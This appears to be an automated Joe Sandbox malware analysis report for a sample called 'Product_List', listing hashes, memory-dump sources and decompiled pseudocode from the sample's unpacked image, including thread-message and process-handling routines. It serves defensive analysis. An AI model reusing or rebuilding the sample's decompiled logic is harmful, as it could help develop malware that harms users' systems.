                                                      • Opcode ID: f8ce91b017626d98117a1137444ac8321074be9fcedf98dd808d8d3b9ccf114c
                                                      • Instruction ID: bf89b348796fb37362078d1db7456f50fa62f35ff3243a6cb309d27fac9052cf
                                                      • Opcode Fuzzy Hash: f8ce91b017626d98117a1137444ac8321074be9fcedf98dd808d8d3b9ccf114c
                                                      • Instruction Fuzzy Hash: 3B9002B120500407D190719984447864005E7D4345F51C031A5054554EC7999DD576A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 51ca03c3446c7e1a7dda3ed649ac88d14d9cb940337ffd6905f05c6fafe0dea3
                                                      • Instruction ID: cf92c9341c36ff4b9ebca7d8f71b5ee71904ddb52feb551751cac8b7fab021d0
                                                      • Opcode Fuzzy Hash: 51ca03c3446c7e1a7dda3ed649ac88d14d9cb940337ffd6905f05c6fafe0dea3
                                                      • Instruction Fuzzy Hash: C79002A120600007415571998454756800AE7E4245B51C031E1004590DC66598917165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 09ce53187922aeed2fc3ca7a84f9cb26f89ec95db7bbd1a2374458c51344ed6d
                                                      • Instruction ID: 4c23129f3dcd4be09e5206ca891d16fb52c848c96e438d482d9465f4e912a6a1
                                                      • Opcode Fuzzy Hash: 09ce53187922aeed2fc3ca7a84f9cb26f89ec95db7bbd1a2374458c51344ed6d
                                                      • Instruction Fuzzy Hash: 229002A134500447D15061998454B464005E7E5345F51C035E1054554DC759DC527166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b2c23c40aaa04992f35acacd7e8035b7c06ccf09dcc59ae2b5c9cf7222af024e
                                                      • Instruction ID: ec29041c547b21da538901b6f73412a0d2a10f7cfcc5b7622117d39d666e253b
                                                      • Opcode Fuzzy Hash: b2c23c40aaa04992f35acacd7e8035b7c06ccf09dcc59ae2b5c9cf7222af024e
                                                      • Instruction Fuzzy Hash: DA90027120500417D161619985447474009E7D4285F91C432A0414558DD7969952B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b566c2aeb3c069609cb65559540eed357507c7d33b3d2d21e85336c16124192f
                                                      • Instruction ID: 6f1bad59ad5891fb4cd7fcb7281c3bc9439d2f5b8f342d97a5250d73c5e76795
                                                      • Opcode Fuzzy Hash: b566c2aeb3c069609cb65559540eed357507c7d33b3d2d21e85336c16124192f
                                                      • Instruction Fuzzy Hash: EA900261246041575595B19984446478006F7E4285791C032A1404950CC666A856F661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5380fef33b2082008051af4287cda7ba6f027408365515d134b18b8dc4de34ba
                                                      • Instruction ID: 86d3ec40a8b41f3a150bdb413bf9e2caa496312c473e272e3393033f183013e2
                                                      • Opcode Fuzzy Hash: 5380fef33b2082008051af4287cda7ba6f027408365515d134b18b8dc4de34ba
                                                      • Instruction Fuzzy Hash: D190026160500507D15171998444756400AE7D4285F91C032A1014555ECB659992B171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5dfe6eda2f95a1dc15a589065cae9140dc9c38e781d62cc70c7bdd4fd67cffe0
                                                      • Instruction ID: 27967f0df735340bff0dc56d354342f576563fcce5c6cd58c21ef45a9b908312
                                                      • Opcode Fuzzy Hash: 5dfe6eda2f95a1dc15a589065cae9140dc9c38e781d62cc70c7bdd4fd67cffe0
                                                      • Instruction Fuzzy Hash: 9A90027120500407D15065D994487864005E7E4345F51D031A5014555EC7A598917171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5ef0dc8ee42d05fa35c7b77114e137123fc3ba7d80cf8ca97b3c3a0d3fa6f22d
                                                      • Instruction ID: 9c27735cab906f52e53157beedba43f929f44a0dd79add4eb9e9868af4705b38
                                                      • Opcode Fuzzy Hash: 5ef0dc8ee42d05fa35c7b77114e137123fc3ba7d80cf8ca97b3c3a0d3fa6f22d
                                                      • Instruction Fuzzy Hash: 8690027131514407D1606199C4447464005E7D5245F51C431A0814558DC7D598917162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 60d271d5fbe004eb511bf2c68ee63152bcc603485739d9f2064399213ba9ce83
                                                      • Instruction ID: b0c9de6a312d45dc4b2cbd2d5ecaf59441ab43f22cc73cbb395fa774232520ad
                                                      • Opcode Fuzzy Hash: 60d271d5fbe004eb511bf2c68ee63152bcc603485739d9f2064399213ba9ce83
                                                      • Instruction Fuzzy Hash: 2590026130500007D190719994587468005F7E5345F51D031E0404554CDA5598567262
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 76f2ed20663e0903f002339e3ebaae59ffc76348598f6cc3aa9aac445d68110b
                                                      • Instruction ID: 47de76d30ec4c54f2c34f3bc0a45f2871cd5e201f203ec7e9bb1872e93154a50
                                                      • Opcode Fuzzy Hash: 76f2ed20663e0903f002339e3ebaae59ffc76348598f6cc3aa9aac445d68110b
                                                      • Instruction Fuzzy Hash: FC90026921700007D1D07199944874A4005E7D5246F91D435A0005558CCA5598697361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2d72433ebfe9b431462f89c886826e239fa1f5e9decd3469c6127b4cba806910
                                                      • Instruction ID: 6161ad4643dd317fe6a2b825c2317043d82548f13d16c5c30fc1ef3718c3e39b
                                                      • Opcode Fuzzy Hash: 2d72433ebfe9b431462f89c886826e239fa1f5e9decd3469c6127b4cba806910
                                                      • Instruction Fuzzy Hash: 6790027120500807D1D07199844478A4005E7D5345F91C035A0015654DCB559A5977E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 051fe53ddfa1cd644e786550c35ea1d35ff9eb57e695c1ef0d54d6d6b1fd6f45
                                                      • Instruction ID: 77a14058d86b00a517977837ec8cdcd31f60906994262b2390f44c3744bf029a
                                                      • Opcode Fuzzy Hash: 051fe53ddfa1cd644e786550c35ea1d35ff9eb57e695c1ef0d54d6d6b1fd6f45
                                                      • Instruction Fuzzy Hash: 4490026121580047D25065A98C54B474005E7D4347F51C135A0144554CCA5598617561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c11343bbf7d2e1803e0a3cfad31207179ba4300a6e45ba79e9b460f05e02ab76
                                                      • Instruction ID: 594ebf715949d91fd8f333e6b776a2c2b9ceed7b5cfdf497f19a9035b5217840
                                                      • Opcode Fuzzy Hash: c11343bbf7d2e1803e0a3cfad31207179ba4300a6e45ba79e9b460f05e02ab76
                                                      • Instruction Fuzzy Hash: 8290026160500047419071A9C884A468005FBE5255751C131A0988550DC699986576A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6f4346717b5a4da9ea8270c0855de5e64b6a37bdfaba723ed5d6776fa6cab46f
                                                      • Instruction ID: cfea96fc7769d41888ff79298a9b0028d227f44cb18f4580e34d471a65c4560c
                                                      • Opcode Fuzzy Hash: 6f4346717b5a4da9ea8270c0855de5e64b6a37bdfaba723ed5d6776fa6cab46f
                                                      • Instruction Fuzzy Hash: 6090027120540407D1506199885474B4005E7D4346F51C031A1154555DC765985175B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 81b0e999fa1c433a65a352eeaf9fb14232ac1a2d2db6dfb46a9799d10f57a504
                                                      • Instruction ID: 17e66e04f10e22f2c7bf9250c1343160c9797e17704b921740fa498ca1906775
                                                      • Opcode Fuzzy Hash: 81b0e999fa1c433a65a352eeaf9fb14232ac1a2d2db6dfb46a9799d10f57a504
                                                      • Instruction Fuzzy Hash: 7A90027120508807D1606199C44478A4005E7D4345F55C431A4414658DC7D598917161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E8B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 41e8b3-41e8df call 41f1b3 ExitProcess
                                                      C-Code - Quality: 100%
                                                      			E0041E8B3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x9b0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x9b0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                      0x0041e8b6
                                                      0x0041e8cd
                                                      0x0041e8db

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: w5@
                                                      • API String ID: 621844428-2048009441
                                                      • Opcode ID: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                                      • Instruction ID: 1ed00d9a66ebf349a6f1bdeba4fc8f4a3585a7d1f921a18fc4373dfdb201933d
                                                      • Opcode Fuzzy Hash: 8507ec16cc2b02f0ab8836c409ef938952160c81a4140b7f33e31095b455bb70
                                                      • Instruction Fuzzy Hash: B6D01272600314BBD620DB99DC45FD777ACDF456A4F054065BA4C5B242C674BA10C7E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040992B Relevance: 1.7, APIs: 1, Instructions: 185threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 337 40992b-409931 338 409933-40998b call 420183 call 409893 call 41f9d3 337->338 339 4098cf-4098e7 call 402e13 call 4195b3 337->339 353 409993-4099c5 call 4102e3 call 41e703 338->353 349 409920-409926 339->349 350 4098e9-4098fa PostThreadMessageW 339->350 350->349 352 4098fc-40991d call 40c5d3 350->352 352->349 360 4099c7-4099cf 353->360 361 4099fa-409a02 353->361 362 4099d1-4099d8 360->362 363 4099e9-4099f3 360->363 362->363 364 4099da-4099e1 362->364 363->353 365 4099f5-4099f8 363->365 364->363 366 4099e3-4099e7 364->366 367 409a20-409a32 call 41e693 365->367 366->363 368 409a03-409a1d call 420103 366->368 367->361 372 409a34-409a9f call 41df13 367->372 368->367 372->361 376 409aa5-409b01 call 41df53 372->376 376->361 379 409b07-409b54 call 41f673 call 41f693 call 420323 call 420103 call 4191a3 376->379
                                                      C-Code - Quality: 75%
                                                      			E0040992B(void* __eflags, intOrPtr _a4, int _a8, int _a12, int _a16) {
				int _v8;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __ebx;
				intOrPtr __edi;
				int __esi;
				int _t60;
				void* _t63;
				void* _t67;
				long _t69;
				void* _t70;
				int _t71;

				asm("sahf");
				if(__eflags < 0) {
					_t60 = E004195B3(_t70, _t67, 0, 0, E00402E13());
					_t71 = _t60;
					if(_t71 != 0) {
						_t69 =  *0xFFFFFFFFF2FE0EE5;
						_t60 = PostThreadMessageW(_t69, 0x111, 0, 0); // executed
						if(_t60 == 0) {
							_t3 = (E0040C5D3(1, 8, _t63 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
							_t60 =  *_t71(_t69, 0x8003, 0xf2fe0ed9 + _t3, _t60);
						}
					}
					return _t60;
				} else {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E00420183( &_v684, 0, 0x2a4);
					__esi = _a16;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E00409893(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041F9D3(__ecx);
					_t12 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t12;
					_a16 = 0;
					while(1) {
						__eax = E004102E3(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041E703(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L11:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L15;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L11;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L11;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E00420103(_a12,  &_v688, 0x2a8);
										L15:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041E693(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t32 = __esi + 0x2e8; // 0x2e8
											__eax = _t32;
											 *_t32 = _v136;
											__eax = _a12;
											_t34 = __esi + 0x314; // 0x314
											__ebx = _t34;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E0041DF13(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t42 = __esi + 0x2e0; // 0x2e0
												__eax = _t42;
												_push(_t42);
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												__ecx = _a12;
												_push(__ebx);
												_push(0x1a);
												__ecx = _a12 + 0x224;
												_push(_a12 + 0x224);
												 *(__esi + 0x2e4) = __edx;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E0041DF53(__ebx, __edx, __edi);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E0041F673(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E00420323( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t57 = __eax + 2; // 0x2
													__ecx = __eax + _t57;
													__eax =  &_v656;
													__eax = E004191A3(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L11;
									}
								}
							}
						}
						goto L19;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L19:
			}



















                                                      0x0040992b
                                                      0x00409931
                                                      0x004098db
                                                      0x004098e0
                                                      0x004098e7
                                                      0x004098e9
                                                      0x004098f6
                                                      0x004098fa
                                                      0x00409913
                                                      0x0040991e
                                                      0x0040991e
                                                      0x004098fa
                                                      0x00409926
                                                      0x00409933
                                                      0x00409933
                                                      0x00409934
                                                      0x00409936
                                                      0x0040993c
                                                      0x0040993d
                                                      0x0040993e
                                                      0x0040993f
                                                      0x00409947
                                                      0x0040994a
                                                      0x00409957
                                                      0x0040995c
                                                      0x0040995f
                                                      0x00409965
                                                      0x0040996a
                                                      0x00409972
                                                      0x0040997d
                                                      0x0040997d
                                                      0x00409984
                                                      0x00409993
                                                      0x00409999
                                                      0x0040999e
                                                      0x004099ab
                                                      0x004099b5
                                                      0x004099bd
                                                      0x004099c3
                                                      0x004099c5
                                                      0x00000000
                                                      0x00000000
                                                      0x004099c7
                                                      0x004099cf
                                                      0x004099e9
                                                      0x004099e9
                                                      0x004099ec
                                                      0x004099ed
                                                      0x004099f0
                                                      0x004099f3
                                                      0x00000000
                                                      0x004099f5
                                                      0x004099f5
                                                      0x00000000
                                                      0x004099f5
                                                      0x004099d1
                                                      0x004099d1
                                                      0x004099d8
                                                      0x00000000
                                                      0x004099da
                                                      0x004099da
                                                      0x004099e1
                                                      0x00000000
                                                      0x004099e3
                                                      0x004099e3
                                                      0x004099e7
                                                      0x00409a03
                                                      0x00409a0b
                                                      0x00409a13
                                                      0x00409a18
                                                      0x00409a20
                                                      0x00409a20
                                                      0x00409a28
                                                      0x00409a30
                                                      0x00409a32
                                                      0x00000000
                                                      0x00409a34
                                                      0x00409a34
                                                      0x00409a3a
                                                      0x00409a3d
                                                      0x00409a43
                                                      0x00409a46
                                                      0x00409a4c
                                                      0x00409a4c
                                                      0x00409a53
                                                      0x00409a55
                                                      0x00409a58
                                                      0x00409a58
                                                      0x00409a5f
                                                      0x00409a62
                                                      0x00409a69
                                                      0x00409a6f
                                                      0x00409a75
                                                      0x00409a7b
                                                      0x00409a81
                                                      0x00409a87
                                                      0x00409a8d
                                                      0x00409a92
                                                      0x00409a97
                                                      0x00409a9d
                                                      0x00409a9f
                                                      0x00000000
                                                      0x00409aa5
                                                      0x00409aa5
                                                      0x00409aa8
                                                      0x00409aa8
                                                      0x00409aae
                                                      0x00409aaf
                                                      0x00409ab5
                                                      0x00409abb
                                                      0x00409ac1
                                                      0x00409ac7
                                                      0x00409acd
                                                      0x00409ad0
                                                      0x00409ad1
                                                      0x00409ad3
                                                      0x00409ad9
                                                      0x00409adb
                                                      0x00409ae1
                                                      0x00409ae7
                                                      0x00409af1
                                                      0x00409af9
                                                      0x00409aff
                                                      0x00409b01
                                                      0x00000000
                                                      0x00409b07
                                                      0x00409b07
                                                      0x00409b0d
                                                      0x00409b0d
                                                      0x00409b13
                                                      0x00409b20
                                                      0x00409b22
                                                      0x00409b26
                                                      0x00409b2b
                                                      0x00409b2e
                                                      0x00409b2e
                                                      0x00409b3e
                                                      0x00409b46
                                                      0x00409b4e
                                                      0x00409b4f
                                                      0x00409b50
                                                      0x00409b51
                                                      0x00409b53
                                                      0x00409b54
                                                      0x00409b54
                                                      0x00409b01
                                                      0x00409a9f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004099e7
                                                      0x004099e1
                                                      0x004099d8
                                                      0x00000000
                                                      0x004099cf
                                                      0x004099fa
                                                      0x004099fb
                                                      0x004099fc
                                                      0x004099fc
                                                      0x004099fe
                                                      0x004099ff
                                                      0x00409a01
                                                      0x00409a02
                                                      0x00409a02
                                                      0x00000000

                                                      APIs
                                                      • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                                      • Instruction ID: 42ad5854a2e7b942de746f5d6c01182a578b4c63b133ec1084285a3336115312
                                                      • Opcode Fuzzy Hash: 57c576fd5b33c225fe90ea2f8ddec34eeb8c30a143ed0efce676ca8fdbc808e1
                                                      • Instruction Fuzzy Hash: F461B4B0A00305AFD724DF65DC86BEB73A8EB45304F00457EF949A7381DB74AE418BA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409893 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 71%
                                                      			E00409893(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				void* _t24;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420183( &_v67, 0, 0x3f);
				E00420C33( &_v68, 3);
				_t19 = _a4;
				_t26 = _a4 + 0x20;
				_t13 = E0040CF03(_t32, _a4 + 0x20,  &_v68); // executed
				_push(0xbf25f8a5);
				_t24 = _t13;
				_t15 = E004195B3(_t26, _t24, 0, 0, E00402E13());
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t9 = (E0040C5D3(1, 8, _t19 + 0x3b4) & 0x000000ff) - 0x40; // 0xf2fe0e99
						return  *_t27(_t25, 0x8003, _t28 + _t9, _t15);
					}
				}
				return _t15;
			}












                                                      0x00409893
                                                      0x004098a4
                                                      0x004098a8
                                                      0x004098b3
                                                      0x004098b8
                                                      0x004098bf
                                                      0x004098c3
                                                      0x004098c8
                                                      0x004098cd
                                                      0x004098db
                                                      0x004098e0
                                                      0x004098e7
                                                      0x004098e9
                                                      0x004098f6
                                                      0x004098fa
                                                      0x00409913
                                                      0x00000000
                                                      0x0040991e
                                                      0x004098fa
                                                      0x00409926

                                                      APIs
                                                      • PostThreadMessageW.USER32(000081AE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098F6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_Product_List.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
